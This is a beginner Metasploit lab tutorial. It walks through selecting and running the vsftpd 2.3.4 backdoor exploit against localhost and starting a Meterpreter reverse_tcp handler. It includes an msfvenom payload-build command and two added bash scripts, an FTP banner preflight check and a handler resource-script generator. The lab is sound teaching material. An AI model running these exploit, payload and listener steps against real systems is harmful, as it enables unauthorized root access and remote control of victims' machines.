Kali Exploitation with Metasploit


Introduction

In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on the Metasploit Framework: searching its module database, selecting an exploit, understanding how a payload is chosen for it, running the exploit against a target, and setting up a handler that would receive a Meterpreter session. Designed for beginners, this lab guides you step by step through these techniques in a safe and structured manner. There is no live target in the environment, so the exploit attempt in this lab is expected to fail; the emphasis is on the workflow and on reading Metasploit's output correctly. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.


Skills Graph

Lab skills covered (lab-552293): Kali package management, the Metasploit Framework, and Bash scripting.

Starting Metasploit Framework

In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.

When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.

Before using Metasploit, make sure it is installed in the Kali Linux container. Update the package list and install the Metasploit Framework by typing the following commands in the terminal and pressing Enter after each one (the lab shell runs as root; on a Kali install where you work as a normal user, prefix each command with sudo):

apt update
apt install -y metasploit-framework

These commands refresh the package list and install Metasploit if it is not already present. The installation may take a few minutes, so please wait for it to complete.

Once installed, start the Metasploit console by typing the following command and pressing Enter:

msfconsole

The first time you run this command, it may take a moment to load the modules and build the module cache. On Kali, msfconsole does not create its PostgreSQL database by itself; the console works without one, and you only need the database (created with msfdb init, run before msfconsole) for workspaces and for storing discovered hosts and services. Be patient during this process.

You will see an output similar to this when Metasploit starts:

Metasploit Framework
...
msf6 >

The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. The number (here 6) is the major version of Metasploit, so the prompt may read differently on another release.

This step familiarizes you with launching Metasploit, which is the foundation for all subsequent penetration testing activities in this lab. Do not exit the console, as you will use it in the next step to search for and select an exploit.

Searching and Selecting an Exploit

Now that you have started the Metasploit Framework, the next step is to search for and select an exploit to target a specific vulnerability. This process is crucial in penetration testing as it helps identify potential weaknesses in systems or applications.

An exploit is code that takes advantage of a vulnerability in a system to run commands or gain access that the system's owner did not intend. Metasploit ships a large, categorized database of exploit modules, alongside auxiliary modules (scanners and probes that do not exploit anything) and post-exploitation modules, which makes it easier to test for vulnerabilities in a controlled environment like this lab.

Since you are already in the Metasploit console (with the msf6 > prompt), search for modules related to FTP. Plain FTP servers are a classic target: older releases have had well-known flaws, and the protocol sends credentials in clear text. Type the following command at the msf6 > prompt and press Enter:

search ftp

This command lists every module whose name or description matches ftp, so the list is long and the exact entries depend on your Metasploit version. To narrow it, search accepts keyword filters such as type:exploit, name:, platform: and cve:; for example, search type:exploit name:vsftpd returns only the exploit modules for vsftpd. The output will look something like this:

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor          2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                              normal     No     FTP Version Scanner
   2  auxiliary/scanner/ftp/anonymous                                normal     No     FTP Anonymous Access Scanner
...

In this output, exploit modules (which run code against a target) appear next to auxiliary modules (which only scan or probe). For this lab, focus on exploit/unix/ftp/vsftpd_234_backdoor. It targets a backdoor that was planted in the vsftpd 2.3.4 source tarball distributed from the project's download site in 2011 (CVE-2011-2523): when a client logs in with a username ending in :), the server opens a root shell on TCP port 6200. The Rank column reads excellent, meaning the module is reliable and does not crash the service, and the Check column reads No, meaning the module cannot test for the flaw without attempting to exploit it.

To select this exploit, type the following command and press Enter:

use exploit/unix/ftp/vsftpd_234_backdoor

If successful, the prompt will change to something like:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

This indicates that you have selected the exploit. The console also prints [*] No payload configured, defaulting to cmd/unix/interact, which you will look at in the payload step. At this point, you are not running the exploit; you are only preparing it for the next steps.

To confirm the selection, type the following command and press Enter:

info

This displays detailed information about the selected exploit. Look for the line that says Name: VSFTPD v2.3.4 Backdoor Command Execution to verify you have the correct exploit. The output starts like this:

Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
...

You have now successfully searched for and selected an exploit in Metasploit. This step builds the foundation for configuring a payload in the next step, so do not exit the console as you will continue working from here.

Understanding the Payload: Reverse vs. Bind Shells

With the exploit selected, the next step is to look at its payload. The payload defines what happens after the vulnerability is exploited, and it is what gives you access to the target system in a controlled manner.

A payload in penetration testing is the component of an exploit that determines the action taken after successful exploitation. A reverse shell is a payload where the target system connects back to your machine, to the address and port you configure as LHOST and LPORT, giving you a command-line interface to interact with it; it is the usual choice because an outbound connection from the target is less likely to be blocked by a firewall than an inbound one. A bind shell is the opposite: the payload listens on the target and you connect to it.

Not every payload fits every exploit. A module only accepts payloads that match how it delivers code, and you can list the compatible ones from the module prompt. Since you are still in the Metasploit console with the vsftpd_234_backdoor exploit selected (prompt should be msf6 exploit(unix/ftp/vsftpd_234_backdoor) >), type the following command and press Enter:

show payloads

The output lists exactly one compatible payload (the column layout varies slightly between versions):

Compatible Payloads
===================

   #  Name               Disclosure Date  Rank    Check  Description
   -  ----               ---------------  ----    -----  -----------
   0  cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

The reason is that the vsftpd 2.3.4 backdoor is itself a bind-style shell: once triggered, the server opens a root shell on TCP port 6200 and the module connects to it. There is nothing for the target to call back to, so this module has no LHOST or LPORT options and a reverse payload cannot be used with it. Metasploit already selected cmd/unix/interact for you when you ran use, so there is nothing to set here; if you try set payload cmd/unix/reverse, the console rejects it with:

[-] The value specified for payload is not valid.

To see the options that do apply, type the following command and press Enter:

show options

This displays a table of options for the exploit and for the payload. The parts that matter here look like this (the option descriptions vary by version):

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ...
   RHOSTS                   yes       The target host(s)
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

RHOSTS, the target address, is the only required option still unset; you will set it before running the exploit in the next step. LHOST and LPORT appear only for reverse payloads, and you will configure them on the Meterpreter handler in the last step. When you do, remember that LHOST must be an address the target can actually reach: 127.0.0.1 is fine in this lab, where attacker and target would be the same container, but on a real engagement it has to be the IP of your interface that faces the target.

Do not exit the Metasploit console, as you will use this module to run the exploit in the next step.

Running the Exploit

Having selected the exploit and checked its payload, you are now ready to run it with the Metasploit Framework. This step shows how an exploit is executed against a target and how to read the result.

Running an exploit means instructing Metasploit to use the selected exploit and payload against a target. In a real scenario, you would specify the IP address of a vulnerable machine. In this lab environment there is no target, so you will point the module at localhost (127.0.0.1) and focus on the mechanics of execution.

You should still be in the Metasploit console with the vsftpd_234_backdoor exploit selected. First, set the target address, RHOSTS, to 127.0.0.1. The option accepts a single IP, a range, or a CIDR block, and Metasploit runs the module against each address in turn. Type the following command and press Enter:

set RHOSTS 127.0.0.1

The output will confirm:

RHOSTS => 127.0.0.1

The target port, RPORT, already defaults to 21, the standard FTP port, so it does not need to be set. Now execute the exploit by typing the following command and pressing Enter:

exploit

Metasploit will attempt to run the exploit against the specified target. Since no vsftpd service is listening on port 21 of localhost in this lab environment, the exploit will fail, which is expected. The output looks like this:

[-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:21).
[*] Exploit completed, but no session was created.

This output shows that Metasploit tried to open a TCP connection to port 21 on the target and was refused because nothing is listening there, so it never got as far as sending the backdoor trigger. Note that no reverse TCP handler is started: this module's payload waits for the target to open port 6200 rather than listening on your machine. On a real vulnerable target the module would log in with a username ending in :), connect to port 6200, verify the shell by running id, and report that a command shell session was opened, at which point you would be typing commands as root on the target. A refused connection before that point means the service is down, filtered, or on a different port; check reachability first, and if the service is up but its banner is not vsFTPd 2.3.4, this module does not apply.
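The check a practitioner would run before typing exploit, as an added example that is not part of the original lab: it uses bash's /dev/tcp to connect to the target's FTP port, reads the server greeting, and reports whether vsFTPd 2.3.4 is advertised. Against this lab's 127.0.0.1:21 it reports the same refused connection Metasploit shows above, but without sending any exploit traffic. The 3-second timeout, the return codes and the helper names are this example's own choices, and it assumes bash and the coreutils timeout command are installed.

```bash
#!/usr/bin/env bash
# Added example, not part of the LabEx lab: a pre-flight check for the
# vsftpd_234_backdoor step. Before typing `exploit`, confirm that something
# is listening on RHOSTS:21 and that its greeting is the release the module
# targets. Assumptions: bash (for /dev/tcp) and coreutils `timeout` exist.

# probe_ftp_banner HOST PORT
# Prints the first line the server sends (the FTP greeting) on stdout.
# Returns non-zero if the TCP connect fails or nothing arrives within 3s.
probe_ftp_banner() {
  timeout 3 bash -c '
    exec 3<>"/dev/tcp/$0/$1" || exit 1   # bash-only TCP client, no netcat needed
    IFS= read -r line <&3 || exit 1       # FTP servers speak first: "220 ..."
    printf "%s\n" "$line" | tr -d "\r"    # drop the CR of the CRLF terminator
    exec 3<&- 3>&-
  ' "$1" "$2" 2>/dev/null
}

# banner_is_vsftpd_234 BANNER
# Returns 0 only if the greeting advertises the backdoored release.
banner_is_vsftpd_234() {
  case "$1" in
    *"vsFTPd 2.3.4"*) return 0 ;;
    *) return 1 ;;
  esac
}

# preflight HOST [PORT]
#   0: vsFTPd 2.3.4 advertised, the module applies
#   1: a service answered, but it is not vsFTPd 2.3.4
#   2: nothing reachable (Metasploit would report the target as unreachable)
preflight() {
  host="$1" port="${2:-21}"
  if ! banner=$(probe_ftp_banner "$host" "$port"); then
    echo "[-] $host:$port - no FTP service reachable; the exploit would fail as unreachable" >&2
    return 2
  fi
  echo "[*] $host:$port - banner: $banner"
  if banner_is_vsftpd_234 "$banner"; then
    echo "[+] $host:$port - vsFTPd 2.3.4 advertised; exploit/unix/ftp/vsftpd_234_backdoor applies"
    return 0
  fi
  echo "[-] $host:$port - not vsFTPd 2.3.4; this module does not apply" >&2
  return 1
}

# Stand-alone use:  bash preflight.sh 127.0.0.1 21
if [ $# -gt 0 ]; then
  preflight "$@"
fi
```

Run it as bash preflight.sh 127.0.0.1 21 to see the unreachable case this lab produces; the banner check is deliberately a substring match, because vsftpd prints its version in the greeting and the backdoored tarball reports itself as 2.3.4.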

This step teaches you the process of running an exploit in Metasploit. Keep the console open, as you will move to setting up a Meterpreter payload in the next step.

Setting Up a Meterpreter Payload and Listener

In this step, you will set up a Meterpreter payload and start a listener (a handler) for it. Since this is a simulated lab environment without a real target, no session will be created, but you will see how the receiving side of a reverse payload is prepared for post-exploitation.

Meterpreter is an advanced payload in Metasploit that provides an interactive shell for post-exploitation activities such as file system navigation, process management, and pivoting, and it runs in memory on the target rather than spawning a system shell. Unlike the basic command shell the vsftpd backdoor gives you, it is a staged payload: a small stager connects back to your handler and then downloads the full Meterpreter code from it. A session in Metasploit is an active connection between you and the target, through which you run commands.

Since the previous exploit did not result in a session, you will use the standalone handler module, which does no exploitation of its own and simply waits for a payload to connect. If you are still in the Metasploit console, type the following command to switch to the multi/handler module and press Enter:

use exploit/multi/handler

The prompt should change to:

msf6 exploit(multi/handler) >

Now, configure the handler to expect a Meterpreter payload for 32-bit Linux systems. The handler must be set to exactly the payload that was, or will be, delivered to the target, including architecture and staged versus stageless form; otherwise the incoming connection is handled incorrectly. Type the following command and press Enter:

set payload linux/x86/meterpreter/reverse_tcp

The output will confirm:

payload => linux/x86/meterpreter/reverse_tcp

Next, set the listener options. LHOST is the address the handler binds to and the address the payload was built to call back to. Use 127.0.0.1 since this is a simulation on the same machine; on a real engagement it must be your address as seen from the target. Type the following command and press Enter:

set LHOST 127.0.0.1

The output will confirm:

LHOST => 127.0.0.1

Set the port (LPORT) to 4444. Any free port works; on an engagement a less conventional one is often chosen, because 4444 is a well-known default that defenders look for. Type the following command and press Enter:

set LPORT 4444

The output will confirm:

LPORT => 4444

Verify the settings by typing the following command and pressing Enter:

show options

Look for the Payload options section, which should show:

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

If the values are incorrect, repeat the set commands to fix them.

Finally, start the listener by typing the following command and pressing Enter:

exploit

Metasploit will start listening on the specified IP and port. Since there is no real target connecting back, no session will be created. The output will look like this:

[*] Started reverse TCP handler on 127.0.0.1:4444

The console now blocks, waiting for a connection. In a real scenario, when a target runs a payload built for this handler (for example one generated with msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your IP> LPORT=4444 -f elf), the stager connects back, the handler sends the Meterpreter stage, and you would see Meterpreter session 1 opened followed by a meterpreter > prompt. If you want the handler to keep running while you continue using the console, start it with exploit -j instead; it then runs as a background job that you can list with jobs, and incoming sessions are listed with sessions -l and attached with sessions -i <id>. For now, stop the listener by pressing Ctrl + C; Metasploit reports the interruption and returns you to the module prompt.

This step helps you understand how to prepare a Meterpreter payload and its handler, a critical skill for post-exploitation in penetration testing. You can now exit the Metasploit console if desired by typing exit and pressing Enter.
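The handler setup above, packaged as a Metasploit resource script so the whole sequence can be replayed with one command (msfconsole -q -r handler.rc) instead of retyping each set. This is an added example, not code from the lab or from the Metasploit project; the default payload, address and port, the helper names, and the handler.rc file name are this example's own choices. The generated script backgrounds the handler (exploit -j -z) and keeps it listening after the first session (ExitOnSession false), and it validates LHOST and LPORT first so a typo shows up here rather than as a handler bound to the wrong address.

```bash
#!/usr/bin/env bash
# Added example, not part of the LabEx lab: generate a Metasploit resource
# script (.rc) for the multi/handler setup in this step, so the listener is
# started with `msfconsole -q -r handler.rc` instead of typing each `set`.
# Assumptions: the default payload/address/port below are this example's own.

# valid_port PORT  -> 0 if PORT is an integer in 1..65535
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# valid_ipv4 ADDR  -> 0 if ADDR is a dotted quad with every octet in 0..255
valid_ipv4() {
  case "$1" in
    ''|*[!0-9.]*) return 1 ;;     # only digits and dots allowed
  esac
  oldifs=$IFS; IFS=.
  set -- $1                       # split the address into its octets
  IFS=$oldifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in '') return 1 ;; esac   # rejects forms like "1..2.3"
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# build_handler_rc PAYLOAD LHOST LPORT  -> prints the resource script on stdout
build_handler_rc() {
  payload="$1" lhost="$2" lport="$3"
  [ -n "$payload" ] || { echo "error: empty payload" >&2; return 1; }
  valid_ipv4 "$lhost" || { echo "error: LHOST '$lhost' is not an IPv4 address" >&2; return 1; }
  valid_port "$lport" || { echo "error: LPORT '$lport' is not in 1..65535" >&2; return 1; }
  cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Stand-alone use:  bash handler.sh LHOST [LPORT] [PAYLOAD]
# Writes handler.rc and, if msfconsole is on PATH, launches it with the script.
if [ $# -gt 0 ]; then
  build_handler_rc "${3:-linux/x86/meterpreter/reverse_tcp}" "$1" "${2:-4444}" > handler.rc || exit 1
  if command -v msfconsole >/dev/null 2>&1; then
    exec msfconsole -q -r handler.rc
  fi
  echo "msfconsole not found; resource script written to handler.rc" >&2
fi
```

The -j -z flags and ExitOnSession false are what you want for a handler that must outlive the first callback, for example when several hosts will run the same payload; drop them to get the blocking behaviour shown above. Resource scripts are also a convenient place to keep the LHOST and LPORT values in sync with the msfvenom command that built the payload.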

Summary

In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework within a controlled environment on the LabEx VM. You started by launching Metasploit, searched for and selected the vsftpd 2.3.4 backdoor exploit, saw how a module's compatible payloads are listed and why this one uses a bind-style connection rather than a reverse shell, ran the exploit against localhost and read the unreachable-target result, and set up a multi/handler listener for a Meterpreter payload as a post-exploitation simulation. These steps provided a practical introduction to finding modules, choosing payloads, and understanding the exploitation workflow. By following this structured approach in the Kali Linux container's shell, you gained hands-on experience with essential cybersecurity tools and techniques.